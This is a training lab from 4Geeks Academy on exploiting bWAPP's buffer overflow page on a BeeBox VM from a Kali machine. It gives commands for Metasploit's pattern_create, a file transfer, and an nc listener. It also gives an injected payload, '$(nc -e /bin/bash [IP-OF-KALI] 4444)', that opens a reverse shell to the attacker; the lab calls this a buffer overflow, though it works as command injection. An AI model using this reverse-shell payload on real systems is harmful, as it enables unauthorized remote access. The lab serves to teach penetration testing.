Buffer overflow exploit

Buffer overflow exploit

By @rosinni and other contributors at 4Geeks Academy

These instructions are available in english

🌱 How to Start This Project?

This exercise aims to learn how to identify and exploit buffer overflow vulnerabilities. Through this project, you will understand how buffer overflows can be used to execute arbitrary code, as well as apply exploitation techniques to compromise the security of the application.

Requirements

• Kali Machine (attacker)
• BeeBox Machine

📝 Instructions

1. Verify that both Kali Linux and BeeBox are connected to the same network. You can do this by checking the IP addresses assigned to each machine and ensuring they can communicate with each other.

2. Check connectivity. From Kali, try pinging BeeBox and vice versa to confirm that the network connection is working.

   1ping [IP-OF-BEEBOX]
   2ping [IP-OF-KALI]

3. Log in to the BeeBox machine.

4. Find the hash related to the vulnerability (this could be part of the configuration or code).

Verify Buffer Overflow Vulnerability

1. Enter a movie name that is in the bWAPP database (e.g., Hulk, Iron Man).

2. Then enter a movie name that is not in the database (e.g., Harry Potter).

3. Run the following command to view the contents of the bof_1.php file:

   1cat /var/www/bWAPP/bof_1.php

   The goal is to understand how the movie title input is handled and how it is passed as a command-line argument to the application. Look for signs of buffer overflow.

Generate and Use the Exploit String

1. Generate the exploit string by running the following command on Kali to create a string that will help identify the buffer overflow:

   1/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 360

2. Save the generated string in a file named pattern_chain.txt:

   1echo "Aa0Aa1Aa2Aa3Aa4Aa5..." > pattern_chain.txt

3. Start an HTTP server on Kali to transfer the file:

   1python3 -m http.server 8080

4. Download the pattern_chain.txt file on BeeBox using wget:

   1wget http://[IP-OF-KALI]:8080/pattern_chain.txt

5. Read the content of the downloaded file on BeeBox:

   1cat pattern_chain.txt

Inject the Exploit String and Payload

1. Use the string generated with pattern_create.rb in the field or parameter that may cause the buffer overflow in bWAPP.

The goal is to see how the application responds to input that exceeds the expected size.

1. Run a listener on Kali to receive the remote shell:

   1nc -lvnp 4444

2. To obtain a remote shell, inject the following payload into the field that causes the overflow:

   1$(nc -e /bin/bash [IP-OF-KALI] 4444)

Replace [IP-OF-KALI] with the IP address of your Kali machine.

1. Confirm the connection on Kali. If the exploit is successful, you should see a connection in the Kali listener and receive a Bash prompt.

Check Server Logs

1. Review the web server logs on BeeBox for any messages related to the buffer overflow:

   1sudo cat /var/log/apache2/error.log